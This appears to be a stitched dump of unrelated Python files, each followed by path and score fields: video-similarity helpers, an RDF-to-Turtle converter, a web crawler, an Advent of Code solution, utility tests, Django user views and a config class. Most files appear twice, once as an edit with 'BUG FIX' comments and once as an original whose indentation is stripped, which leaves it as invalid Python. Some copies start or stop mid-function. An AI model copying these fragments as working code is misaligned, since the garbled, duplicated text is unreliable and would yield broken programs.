with open(context['gdrive_path'] + pickle_file, 'rb') as handle:
return pickle.load(handle)
def plot_similarity_matrix(m):
fig = px.imshow(m, width=1600, height=800)
fig.update_layout(
margin=dict(l=20, r=20, t=20, b=20),
paper_bgcolor="LightSteelBlue",
)
return fig
def get_indices_of_k_largest(arr, k):
arr[np.tril_indices(arr.shape[0], 0)] = np.nan
idx = np.argpartition((-arr).ravel(), k)
return tuple(np.array(np.unravel_index(idx, arr.shape))[:, range(min(k, 0), max(k, 0))])
def prep_videovote_sheet(data, pairs, tab, context, existing=None):
left = data.iloc[pairs[0]].reset_index()
right = data.iloc[pairs[1]].reset_index()
vvdata = pd.DataFrame({
"title_a": left.title,
"channel_a": left.channel,
"description_a": left.description,
"id_a": left.video_id,
"title_b": right.title,
"channel_b": right.channel,
"description_b": right.description,
"id_b": right.video_id,
"vote": None,
})
for i, r in vvdata.iterrows():
if r.id_a > r.id_b:
temp = (r.title_a, r.channel_a, r.description_a, r.id_a)
(r.title_a, r.channel_a, r.description_a, r.id_a) = (
r.title_b, r.channel_b, r.description_b, r.id_b)
(r.title_b, r.channel_b, r.description_b, r.id_b) = temp
if existing != None:
vvdata = vvdata[[(r.id_a, r.id_b) not in existing for i,
r in vvdata.iterrows()]]
ss = context['gspread_client'].open("Videovote backend")
try:
ws = ss.add_worksheet(tab, rows=len(vvdata), cols="9")
except Exception:
ws = ss.worksheet(tab)
gd.set_with_dataframe(ws, vvdata.reset_index(
drop=True), include_index=False)
def init_eval_pickle(name, context):
temp = {}
with open(context['gdrive_path'] + name, 'wb') as handle:
pickle.dump(temp, handle, protocol=pickle.HIGHEST_PROTOCOL)
def update_eval_data(eval_data, sheet, context):
ws = context['gspread_client'].open("Videovote backend").worksheet(sheet)
new_eval_data = gd.get_as_dataframe(ws).dropna(
axis=1, how='all').dropna(how='all')
for i, r in new_eval_data.iterrows():
key = (r.id_a, r.id_b)
if key in eval_data:
eval_data[key] = eval_data[key] + [r.vote]
else:
eval_data[key] = [r.vote]
return eval_data
def get_equality_matrix(data, part):
d = pdist([[i] for i in data[part]], lambda x, y: 1 if x == y else 0)
return squareform(d)
def print_data_diagnostics(data):
n = len(data)
print(f"Data is length {n}")
nt = len(data[data.transcript.str.len() > 0])
print(f"With transcripts: {nt}")
possible_parts = ["title", "transcript", "description", "thumbnail"]
possible_types = ["embedding", "entities"]
dups = len(data[data.video_id.duplicated()])
if dups != 0:
print(f"Warning! {dups} dupes detected.")
for part in possible_parts:
ap_n = nt if part == "transcript" else n
for type in possible_types:
if f"{part}_{type}" in data:
nv = data[f"{part}_{type}"].isnull().sum()
print(
f"Data has {part}_{type} for {n-nv} rows or {(n-nv)/ap_n * 100}%") | 0.363534 | 0.320476 |
from rdflib import Graph, URIRef, Namespace, Literal
from rdflib.namespace import FOAF, SKOS, DCTERMS
import requests
import json


def _to_term(obj):
    """Convert one RDF/JSON value descriptor (keys: type/value/lang/datatype)
    to an rdflib term.

    BUG FIX: typed literals carry their datatype under the 'datatype' key;
    the original passed obj['type'] (e.g. 'bnode') as the datatype URI.
    """
    if obj['type'] == 'uri':
        return URIRef(obj['value'])
    if obj['type'] == 'literal':
        if 'lang' in obj:
            return Literal(obj['value'], lang=obj['lang'])
        if 'datatype' in obj:
            return Literal(obj['value'], datatype=obj['datatype'])
        return Literal(obj['value'])
    # Fallback for any other descriptor type (e.g. 'bnode' in some dumps).
    return Literal(obj['value'], datatype=obj.get('datatype'))


links = ['http://onomy.org/published/73/skos',
         'http://onomy.org/published/74/skos',
         'https://onomy.org/published/83/skos',
         'http://onomy.org/published/78/skos',
         'http://onomy.org/published/81/skos',
         'https://onomy.org/published/84/skos',
         'http://onomy.org/published/75/skos',
         'http://onomy.org/published/79/skos',
         'http://onomy.org/published/72/skos'
         ]
if __name__ == '__main__':
    for i, link in enumerate(links):
        # Each published vocabulary is fetched as RDF/JSON and rebuilt
        # into an rdflib graph.
        response = requests.get(link)
        content = json.loads(response.text)
        NOM = Namespace('http://onomy.org/onomy-ns#')
        g = Graph()
        g.bind('foaf', FOAF)
        g.bind('onomy', NOM)
        g.bind('dcterms', DCTERMS)
        g.bind('skos', SKOS)
        for subject in content:
            s = URIRef(subject)
            for predicate in content[subject]:
                p = URIRef(predicate)
                objs = content[subject][predicate]
                if isinstance(objs, list):
                    for obj in objs:
                        g.add((s, p, _to_term(obj)))
                elif isinstance(objs, dict):
                    g.add((s, p, _to_term(objs)))
        # Name the output file after the scheme's dcterms:title.
        # BUG FIX: `title` was unbound when the graph contained no
        # skos:ConceptScheme; fall back to the link index.
        title = str(i)
        for s, p, o in g.triples((None, None, SKOS.ConceptScheme)):
            for _, _, t in g.triples((s, DCTERMS.title, None)):
                title = t.toPython()
g.serialize('output/' + title + '.ttl', format='ttl') | pyfusekiutil/convert_rdf_json.py | from rdflib import Graph, URIRef, Namespace, Literal
from rdflib.namespace import FOAF, SKOS, DCTERMS
import requests
import json
links = ['http://onomy.org/published/73/skos',
'http://onomy.org/published/74/skos',
'https://onomy.org/published/83/skos',
'http://onomy.org/published/78/skos',
'http://onomy.org/published/81/skos',
'https://onomy.org/published/84/skos',
'http://onomy.org/published/75/skos',
'http://onomy.org/published/79/skos',
'http://onomy.org/published/72/skos'
]
if __name__ == '__main__':
for i, link in enumerate(links):
response = requests.get(link)
content = json.loads(response.text)
NOM = Namespace('http://onomy.org/onomy-ns#')
g = Graph()
g.bind('foaf', FOAF)
g.bind('onomy', NOM)
g.bind('dcterms', DCTERMS)
g.bind('skos', SKOS)
for subject in content:
s = URIRef(subject)
for predicate in content[subject]:
p = URIRef(predicate)
if isinstance(content[subject][predicate], list):
for obj in content[subject][predicate]:
if obj['type'] == 'uri':
o = URIRef(obj['value'])
elif obj['type'] == 'literal':
if 'lang' in obj:
o = Literal(obj['value'],
lang=obj['lang'])
else:
o = Literal(obj['value'])
else:
o = Literal(obj['value'],
datatype=obj['type'])
g.add((s, p, o))
elif isinstance(content[subject][predicate], dict):
if content[subject][predicate]['type'] == 'uri':
o = URIRef(content[subject][predicate]['value'])
elif content[subject][predicate]['type'] == 'literal':
if 'lang' in content[subject][predicate]:
o = Literal(content[subject][predicate]['value'], lang=content[subject][predicate]['lang'])
else:
o = Literal(content[subject][predicate]['value'])
else:
o = Literal(content[subject][predicate]['value'], datatype=content[subject][predicate]['type'])
g.add((s, p, o))
for s, p, o in g.triples((None, None, SKOS.ConceptScheme)):
for _, _, title in g.triples((s, DCTERMS.title, None)):
title = title.toPython()
g.serialize('output/' + title + '.ttl', format='ttl') | 0.386879 | 0.201656 |
import configparser
from utils import Crawler as CoreCrawler
class Crawler(CoreCrawler):
    """Louisiana-specific crawler: maps a local PDF name to its FTP folder."""
    abbr = 'LA'

    def _get_remote_filename(self, local_filename):
        """Classify the entity and return (directory, '<ABBR> <name>')."""
        name = local_filename
        if local_filename.startswith('City of '):
            directory = 'General Purpose'
            name = local_filename.replace('City of ', '')
        elif 'Inc.' in local_filename or 'Foundation' in local_filename:
            directory = 'Non-Profit'
        else:
            directory = 'Special District'
        return directory, '{} {}'.format(self.abbr, name)
if __name__ == '__main__':
    config = configparser.ConfigParser()
    config.read('conf.ini')
    # NOTE(review): config section is spelled 'loisiana' (sic) — must match conf.ini.
    crawler = Crawler(config, 'loisiana')
    crawler.get(config.get('loisiana', 'url').strip())
    hrefs_clicked = []
    # Last '#parishes' link is excluded ([:-1]).
    for url in crawler.get_attr('#parishes a', 'href', single=False)[:-1]:
        # Re-load the parish page until every box link on it has been visited;
        # clicking a box navigates away, so `loaded` stays False while any
        # unvisited box remains.
        loaded = False
        while not loaded:
            crawler.get(url)
            loaded = True
            for box in crawler.get_elements('div.box'):
                href = crawler.get_attr('a', 'href', root=box)
                if href in hrefs_clicked:
                    continue
                loaded = False
                hrefs_clicked.append(href)
                crawler.click('a', root=box)
                crawler.wait_for_displayed('tr.even')
                # Page through the result table, downloading and uploading
                # each report PDF, until the "next" control is disabled.
                while True:
                    for row in crawler.get_elements('tbody tr'):
                        year = crawler.get_text('.sorting_1', root=row).split('/')[-1]
                        crawler.download(
                            crawler.get_attr('a', 'href', root=row),
                            '{} {}.pdf'.format(crawler.get_text('b', root=row), year)
                        )
                        crawler.upload_to_ftp('{} {}.pdf'.format(crawler.get_text('b', root=row), year))
                    try:
                        crawler.assert_exists('li.next.disabled')
                        break
                    except Exception:
                        crawler.click('li.next a')
                # Only one unvisited box is processed per page load.
                break
crawler.close() | get_LA.py | import configparser
from utils import Crawler as CoreCrawler
class Crawler(CoreCrawler):
abbr = 'LA'
def _get_remote_filename(self, local_filename):
if local_filename.startswith('City of '):
directory = 'General Purpose'
name = local_filename.replace('City of ', '')
else:
if 'Inc.' in local_filename or 'Foundation' in local_filename:
directory = 'Non-Profit'
else:
directory = 'Special District'
name = local_filename
filename = '{} {}'.format(self.abbr, name)
return directory, filename
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read('conf.ini')
crawler = Crawler(config, 'loisiana')
crawler.get(config.get('loisiana', 'url').strip())
hrefs_clicked = []
for url in crawler.get_attr('#parishes a', 'href', single=False)[:-1]:
loaded = False
while not loaded:
crawler.get(url)
loaded = True
for box in crawler.get_elements('div.box'):
href = crawler.get_attr('a', 'href', root=box)
if href in hrefs_clicked:
continue
loaded = False
hrefs_clicked.append(href)
crawler.click('a', root=box)
crawler.wait_for_displayed('tr.even')
while True:
for row in crawler.get_elements('tbody tr'):
year = crawler.get_text('.sorting_1', root=row).split('/')[-1]
crawler.download(
crawler.get_attr('a', 'href', root=row),
'{} {}.pdf'.format(crawler.get_text('b', root=row), year)
)
crawler.upload_to_ftp('{} {}.pdf'.format(crawler.get_text('b', root=row), year))
try:
crawler.assert_exists('li.next.disabled')
break
except Exception:
crawler.click('li.next a')
break
crawler.close() | 0.233532 | 0.053552 |
import sys
from functools import reduce
from typing import Dict, Iterable, List, MutableMapping, Tuple
class Direction:
    """Compass glyphs used in the puzzle's move string."""
    NORTH: str = "^"
    SOUTH: str = "v"
    EAST: str = ">"
    WEST: str = "<"
def present_to_house(
    direction: str,
    cur_loc: Tuple[int, int],
    visited_house_coordinates: MutableMapping[Tuple[int, int], int],
) -> Tuple[int, int]:
    """Move one step from `cur_loc`, record a present at the new house, and
    return the new location.

    Args:
        direction: one of the four Direction glyphs.
        cur_loc: current (x, y) position.
        visited_house_coordinates: mapping (x, y) -> presents delivered,
            updated in place.

    Raises:
        ValueError: if `direction` is not a valid glyph.
    """
    # Unit-move table replaces the original if/elif ladder.
    moves = {
        Direction.NORTH: (0, 1),
        Direction.SOUTH: (0, -1),
        Direction.EAST: (1, 0),
        Direction.WEST: (-1, 0),
    }
    try:
        dx, dy = moves[direction]
    except KeyError:
        raise ValueError(f"{direction} is not a valid direction") from None
    new_loc = (cur_loc[0] + dx, cur_loc[1] + dy)
    # dict.get collapses the original's explicit membership check.
    visited_house_coordinates[new_loc] = visited_house_coordinates.get(new_loc, 0) + 1
    return new_loc
# part 1
def houses_gifted_by_santa(navigation: Iterable[str]) -> int:
    """Count distinct houses Santa visits, including the start at (0, 0)."""
    visited: Dict[Tuple[int, int], int] = {(0, 0): 1}
    loc: Tuple[int, int] = (0, 0)
    # Explicit walk replaces the original functools.reduce fold.
    for step in navigation:
        loc = present_to_house(step, loc, visited)
    return len(visited)
def is_santas_turn(turn_number: int) -> bool:
    """Even turns belong to Santa; odd turns to Robo-Santa."""
    return not turn_number % 2
# part 2
def houses_gifted_by_santa_and_robot(navigation: Iterable[str]) -> int:
    """Count distinct houses when Santa and Robo-Santa alternate moves,
    both starting at (0, 0)."""
    visited: Dict[Tuple[int, int], int] = {(0, 0): 2}
    positions: List[Tuple[int, int]] = [(0, 0), (0, 0)]  # [santa, robot]
    for turn, step in enumerate(navigation):
        mover = 0 if is_santas_turn(turn) else 1
        positions[mover] = present_to_house(step, positions[mover], visited)
    return len(visited)
def main(_: List[str]) -> None:
    """Entry point: read the move string from stdin and print both answers."""
    navigation: str = sys.stdin.read().strip()
    # BUG FIX: both lines previously printed the identical label
    # "Houses with multiple gifts", making the two answers indistinguishable.
    print(f"Houses visited by Santa alone: {houses_gifted_by_santa(navigation)}")
    print(f"Houses visited by Santa and Robo-Santa: {houses_gifted_by_santa_and_robot(navigation)}")
if __name__ == "__main__":
main(sys.argv) | aoc_2015/day_3/python/day3_puzzle.py | import sys
from functools import reduce
from typing import Dict, Iterable, List, MutableMapping, Tuple
class Direction:
NORTH: str = "^"
SOUTH: str = "v"
EAST: str = ">"
WEST: str = "<"
def present_to_house(
direction: str,
cur_loc: Tuple[int, int],
visited_house_coordinates: MutableMapping[Tuple[int, int], int],
) -> Tuple[int, int]:
new_loc: Tuple[int, int]
if direction == Direction.NORTH:
# moves north
new_loc = (cur_loc[0], cur_loc[1] + 1)
elif direction == Direction.SOUTH:
# moves south
new_loc = (cur_loc[0], cur_loc[1] - 1)
elif direction == Direction.EAST:
# moves east
new_loc = (cur_loc[0] + 1, cur_loc[1])
elif direction == Direction.WEST:
# moves west
new_loc = (cur_loc[0] - 1, cur_loc[1])
else:
raise ValueError(f"{direction} is not a valid direction")
if new_loc not in visited_house_coordinates:
visited_house_coordinates[new_loc] = 1
else:
visited_house_coordinates[new_loc] += 1
return new_loc
# part 1
def houses_gifted_by_santa(navigation: Iterable[str]) -> int:
visited_house_coordinates: Dict[Tuple[int, int], int] = {(0, 0): 1}
# Moves through the map
reduce(
lambda cur_loc, direction: present_to_house(direction, cur_loc, visited_house_coordinates),
navigation,
(0, 0),
)
return len(visited_house_coordinates.keys())
def is_santas_turn(turn_number: int) -> bool:
return turn_number % 2 == 0
# part 2
def houses_gifted_by_santa_and_robot(navigation: Iterable[str]) -> int:
visited_house_coordinates: Dict[Tuple[int, int], int] = {(0, 0): 2}
santa_cur_loc: Tuple[int, int] = (0, 0)
robot_santa_cur_loc: Tuple[int, int] = (0, 0)
turns: int = 0
# Moves through the map
for direction in navigation:
if is_santas_turn(turns):
santa_cur_loc = present_to_house(direction, santa_cur_loc, visited_house_coordinates)
else:
robot_santa_cur_loc = present_to_house(
direction, robot_santa_cur_loc, visited_house_coordinates
)
turns += 1
return len(visited_house_coordinates.keys())
def main(_: List[str]) -> None:
"""
This is the entry point.
"""
navigation: str = sys.stdin.read().strip()
print(f"Houses with multiple gifts: {houses_gifted_by_santa(navigation)}")
print(f"Houses with multiple gifts: {houses_gifted_by_santa_and_robot(navigation)}")
if __name__ == "__main__":
main(sys.argv) | 0.534127 | 0.368463 |
import unittest
from binx.utils import bfs_shortest_path, ObjUtils, RecordUtils, DataFrameDtypeConversion
import pandas as pd
from pandas.testing import assert_frame_equal
import numpy as np
from marshmallow import fields
from datetime import datetime, date
class TestUtils(unittest.TestCase):
    def setUp(self):
        # Fresh helper instances before every test.
        self.objutils = ObjUtils()
        self.recordutils = RecordUtils()
        self.dfconv = DataFrameDtypeConversion()
def test_record_utils_replace_nan_with_none(self):
records = [
{'a': 1,'b':2},
{'a': np.nan,'b':3},
{'a': 4,'b': np.nan}
]
test = [
{'a': 1,'b':2},
{'a': None,'b':3},
{'a': 4,'b': None}
]
r = self.recordutils.replace_nan_with_none(records)
self.assertEqual(r, test)
def test_record_utils_columns_to_records(self):
cols = {'a': [1,2], 'b': [3,4]}
test = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
r = self.recordutils.columns_to_records(cols)
self.assertEqual(test, r)
def test_record_utils_records_to_columns(self):
records = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
test = {'a': [1,2], 'b': [3,4]}
c = self.recordutils.records_to_columns(records)
self.assertEqual(test, c)
def test_obj_util_get_fully_qualified_path(self):
class Test:
pass
t = Test()
clspath = self.objutils.get_fully_qualified_path(t)
self.assertEqual('tests.test_utils.Test', clspath)
def test_dfconv_df_nan_to_none(self):
df = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
test = pd.DataFrame({'a':[1, None], 'b':[2,None]})
d = self.dfconv.df_nan_to_none(df)
assert_frame_equal(d, test, check_dtype=False)
def test_dfconv_df_none_to_nan(self):
df = pd.DataFrame({'a':[1, None], 'b':[2,None]})
test = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
d = self.dfconv.df_none_to_nan(df)
assert_frame_equal(test, d)
    def test_bfs_shortest_path(self):
        """bfs_shortest_path returns one shortest node sequence, endpoints included."""
        graph = {
            'A': set(['B', 'C']),
            'B': set(['A', 'D', 'E']),
            'C': set(['A', 'F']),
            'D': set(['B']),
            'E': set(['B', 'F']),
            'F': set(['C', 'E'])
        }
        test = ['A', 'C', 'F']
        result = bfs_shortest_path(graph, 'A', 'F')
        self.assertEqual(test, result)
        # A second target exercises a different branch of the frontier.
        test = ['A', 'B', 'D']
        result = bfs_shortest_path(graph, 'A', 'D')
        self.assertEqual(result, test)
def test_dfconv_date_to_string(self):
# note that only datetime objects get converted to pd.Timestamps.
# datetime.date objects are loaded in as type object not type pd.TimeStamp
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': datetime(2017,5,4)},
{'a': 2, 'b': datetime(2017,6,4, 10, 10, 10), 'c': datetime(2018,5,4)},
{'a': 3, 'b': datetime(2017,7,4, 10, 10, 10), 'c': datetime(2019,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
df = pd.DataFrame.from_records(records)
test_recs = self.dfconv.date_to_string(col_mapping, df)
self.assertEqual(str(test_recs['b'].dtype), 'object')
self.assertEqual(str(test_recs['c'].dtype), 'object')
def test_record_util_date_to_string(self):
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': date(2017,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs)
def test_record_util_date_to_string_with_numpy_and_pandas(self):
records = [
{'a': 1, 'b': pd.Timestamp(2017,5,4, 10, 10, 10), 'c': np.datetime64('2017-05-04')},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs) | tests/test_utils.py | import unittest
from binx.utils import bfs_shortest_path, ObjUtils, RecordUtils, DataFrameDtypeConversion
import pandas as pd
from pandas.testing import assert_frame_equal
import numpy as np
from marshmallow import fields
from datetime import datetime, date
class TestUtils(unittest.TestCase):
def setUp(self):
self.objutils = ObjUtils()
self.recordutils = RecordUtils()
self.dfconv = DataFrameDtypeConversion()
def test_record_utils_replace_nan_with_none(self):
records = [
{'a': 1,'b':2},
{'a': np.nan,'b':3},
{'a': 4,'b': np.nan}
]
test = [
{'a': 1,'b':2},
{'a': None,'b':3},
{'a': 4,'b': None}
]
r = self.recordutils.replace_nan_with_none(records)
self.assertEqual(r, test)
def test_record_utils_columns_to_records(self):
cols = {'a': [1,2], 'b': [3,4]}
test = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
r = self.recordutils.columns_to_records(cols)
self.assertEqual(test, r)
def test_record_utils_records_to_columns(self):
records = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
test = {'a': [1,2], 'b': [3,4]}
c = self.recordutils.records_to_columns(records)
self.assertEqual(test, c)
def test_obj_util_get_fully_qualified_path(self):
class Test:
pass
t = Test()
clspath = self.objutils.get_fully_qualified_path(t)
self.assertEqual('tests.test_utils.Test', clspath)
def test_dfconv_df_nan_to_none(self):
df = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
test = pd.DataFrame({'a':[1, None], 'b':[2,None]})
d = self.dfconv.df_nan_to_none(df)
assert_frame_equal(d, test, check_dtype=False)
def test_dfconv_df_none_to_nan(self):
df = pd.DataFrame({'a':[1, None], 'b':[2,None]})
test = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
d = self.dfconv.df_none_to_nan(df)
assert_frame_equal(test, d)
def test_bfs_shortest_path(self):
graph = {
'A': set(['B', 'C']),
'B': set(['A', 'D', 'E']),
'C': set(['A', 'F']),
'D': set(['B']),
'E': set(['B', 'F']),
'F': set(['C', 'E'])
}
test = ['A', 'C', 'F']
result = bfs_shortest_path(graph, 'A', 'F')
self.assertEqual(test, result)
test = ['A', 'B', 'D']
result = bfs_shortest_path(graph, 'A', 'D')
self.assertEqual(result, test)
def test_dfconv_date_to_string(self):
# note that only datetime objects get converted to pd.Timestamps.
# datetime.date objects are loaded in as type object not type pd.TimeStamp
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': datetime(2017,5,4)},
{'a': 2, 'b': datetime(2017,6,4, 10, 10, 10), 'c': datetime(2018,5,4)},
{'a': 3, 'b': datetime(2017,7,4, 10, 10, 10), 'c': datetime(2019,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
df = pd.DataFrame.from_records(records)
test_recs = self.dfconv.date_to_string(col_mapping, df)
self.assertEqual(str(test_recs['b'].dtype), 'object')
self.assertEqual(str(test_recs['c'].dtype), 'object')
def test_record_util_date_to_string(self):
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': date(2017,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs)
def test_record_util_date_to_string_with_numpy_and_pandas(self):
records = [
{'a': 1, 'b': pd.Timestamp(2017,5,4, 10, 10, 10), 'c': np.datetime64('2017-05-04')},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs) | 0.435661 | 0.644854 |
from multiprocessing import context
from django.shortcuts import render,redirect
from django.contrib.auth import login, authenticate,logout
from django.contrib.auth.models import User
from .models import Profile
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserCreationForm, ProfileForm
# Create your views here.
def loginUser(request):
    """Authenticate a user from POSTed credentials and start a session.

    Authenticated visitors are bounced straight to the profiles page; failed
    attempts re-render the login template with flash messages.
    """
    if request.user.is_authenticated:
        return redirect('profiles')
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        # BUG FIX: was a bare `except:` that swallowed every exception type;
        # only a missing user should produce the flash message.
        try:
            User.objects.get(username=username)
        except User.DoesNotExist:
            messages.error(request, 'Username does not exist')
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            return redirect('profiles')
        else:
            messages.error(request, 'username OR password is incorrect')
    return render(request, 'users/login_register.html')
def logoutUser(request):
    """End the session and bounce back to the login page."""
    logout(request)
    messages.info(request, 'user was successfully logged out')
    return redirect('login')
def registerUser(request):
    """Create a new account from the registration form and log the user in.

    On success the username is lower-cased before saving and the user is
    redirected to the profiles page; on failure the form re-renders with
    an error flash message.
    """
    page = 'register'
    form = UserCreationForm()
    if request.method == 'POST':
        form = UserCreationForm(request.POST)
        if form.is_valid():
            # BUG FIX: the form was saved twice and `user.save` was missing
            # its parentheses, so the lower-cased username was never persisted.
            user = form.save(commit=False)
            user.username = user.username.lower()
            user.save()
            messages.success(request, 'user account was created successfully')
            login(request, user)
            return redirect('profiles')
        else:
            # BUG FIX: errors were reported through messages.success.
            messages.error(request, 'An error has occurred during registration')
    context = {'page': page, 'form': form}
    return render(request, 'users/login_register.html', context)
def profiles(request):
    """Render the listing page of all developer profiles."""
    profiles = Profile.objects.all()
    context = {'profiles':profiles }
    return render(request, 'users/profiles.html', context)
def userProfile(request,pk):
    """Public profile page for the profile with id `pk`.

    Skills with a description are featured as topSkills; ones with an empty
    description are listed separately as otherSkills.
    """
    profile = Profile.objects.get(id=pk)
    topSkills =profile.skill_set.exclude(description__exact="")
    otherSkills = profile.skill_set.filter(description="")
    context={'profile':profile, 'topSkills':topSkills, 'otherSkills':otherSkills}
    return render(request, 'users/user-profile.html',context)
@login_required(login_url='login')
def UserAccount(request):
    """Logged-in user's own account page with their skills and projects."""
    profile =request.user.profile
    skills =profile.skill_set.all()
    projects=profile.project_set.all()
    context = {'profile':profile,'skills':skills,'projects':projects}
    return render(request,'users/account.html',context)
@login_required(login_url='login')
def editAccount(request):
form = ProfileForm()
context={'form':form}
return render(request, 'users/profile_form.html', context) | users/views.py | from multiprocessing import context
from django.shortcuts import render,redirect
from django.contrib.auth import login, authenticate,logout
from django.contrib.auth.models import User
from .models import Profile
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserCreationForm, ProfileForm
# Create your views here.
def loginUser(request):
page = 'login'
if request.user.is_authenticated:
return redirect('profiles')
if request.method=='POST':
username=request.POST['username']
password=request.POST['password']
try:
user=User.objects.get(username=username)
except:
messages.error(request, 'Username does not exist')
user=authenticate(request,username=username,password=password)
if user is not None:
login(request,user)
return redirect('profiles')
else:
messages.error(request,'username OR password is incorrect')
return render(request, 'users/login_register.html')
def logoutUser(request):
logout(request)
messages.info(request, 'user was successfully logged out')
return redirect('login')
def registerUser(request):
    """Create a new account from the registration form and log the user in.

    On success the username is lower-cased before saving and the user is
    redirected to the profiles page; on failure the form re-renders with
    an error flash message.
    """
    page = 'register'
    form = UserCreationForm()
    if request.method == 'POST':
        form = UserCreationForm(request.POST)
        if form.is_valid():
            # BUG FIX: the form was saved twice and `user.save` was missing
            # its parentheses, so the lower-cased username was never persisted.
            user = form.save(commit=False)
            user.username = user.username.lower()
            user.save()
            messages.success(request, 'user account was created successfully')
            login(request, user)
            return redirect('profiles')
        else:
            # BUG FIX: errors were reported through messages.success.
            messages.error(request, 'An error has occurred during registration')
    context = {'page': page, 'form': form}
    return render(request, 'users/login_register.html', context)
def profiles(request):
    """List every developer profile on the site."""
    all_profiles = Profile.objects.all()
    return render(request, 'users/profiles.html', {'profiles': all_profiles})
def userProfile(request, pk):
    """Show one profile, with skills split into described and bare ones."""
    profile = Profile.objects.get(id=pk)
    described_skills = profile.skill_set.exclude(description__exact="")
    bare_skills = profile.skill_set.filter(description="")
    return render(
        request,
        'users/user-profile.html',
        {
            'profile': profile,
            'topSkills': described_skills,
            'otherSkills': bare_skills,
        },
    )
@login_required(login_url='login')
def UserAccount(request):
    """Dashboard showing the logged-in user's profile, skills and projects."""
    profile = request.user.profile
    context = {
        'profile': profile,
        'skills': profile.skill_set.all(),
        'projects': profile.project_set.all(),
    }
    return render(request, 'users/account.html', context)
@login_required(login_url='login')
def editAccount(request):
    """Render the profile edit form for the logged-in user.

    NOTE(review): the form is unbound — it neither pre-fills the current
    profile (no ``instance=``) nor handles POST, so submissions are never
    saved. Confirm whether that is intentional.
    """
    form = ProfileForm()
    context = {'form': form}
return render(request, 'users/profile_form.html', context) | 0.334481 | 0.059183 |
import os
import sys
import enum
import textwrap
from cryptography.fernet import Fernet
import environ
from environ._environ_config import _env_to_bool
def split_by_comma(value):
    """Turn a comma-separated string into a tuple of whitespace-stripped items."""
    return tuple(map(str.strip, value.split(",")))
@environ.config(prefix="")
class NoeConfig:
debug = environ.bool_var(
default=False, name="DJANGO_DEBUG", help="SECURITY WARNING: Don't run with debug turned on in production!"
)
secret_key = environ.var(help="SECURITY WARNING: keep the secret key used in production secret!")
frontend_url = environ.var(help="Where the React frontend SPA is hosted")
backend_url = environ.var(help="Where the Django backend is hosted")
allowed_hosts = environ.var(default="*", converter=split_by_comma)
allowed_cors_hosts = environ.var(default=None, converter=lambda val: split_by_comma(val) if val else None)
behind_tls_proxy = environ.bool_var(
default=False,
help='Whether or not to set the "X-Forwarded-Proto" header to "https". Should be set to True behind a proxy.',
)
language_code = environ.var(default="hu-hu")
time_zone = environ.var(default="Europe/Budapest")
log_level = environ.var(default="INFO", help="Python logger log level")
sentry_dsn_url = environ.var(
default=None, name="SENTRY_DSN_URL", help="If you want to track exceptions with https://sentry.io",
)
@environ.config
class Database:
_DB_SQLITE_ENGINE = "django.db.backends.sqlite3"
_PARAM_HELP = "Not required for SQLite"
def _convert_database_engine(value):
if value == "postgresql":
return "django.db.backends.postgresql"
elif value in ("mysql", "mariadb"):
return "django.db.backends.mysql"
elif value in ("sqlite", "sqlite3"):
return NoeConfig.Database._DB_SQLITE_ENGINE
raise ValueError(
f'Invalid database engine: {value!r}\npossible values: "postgresql", "mysql", "mariadb", "sqlite"'
)
def _validate_param(obj, attribute, value):
if not value and obj.engine != NoeConfig.Database._DB_SQLITE_ENGINE:
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
engine = environ.var(converter=_convert_database_engine)
name = environ.var()
user = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
password = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
host = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
port = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
database = environ.group(Database)
@environ.config
class Email:
class Backend(enum.Enum):
CONSOLE = "console"
SMTP = "smtp"
_PARAM_HELP = "Required for SMTP only"
def _convert_backend(value):
backend = NoeConfig.Email.Backend(value)
return f"django.core.mail.backends.{backend.value}.EmailBackend"
def _validate_param(obj, attribute, value):
if not value and obj.backend == "smtp":
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
def _convert_verification_key(value):
if value is None:
raise ValueError("You need to generate an EMAIL_VERIFICATION_KEY.")
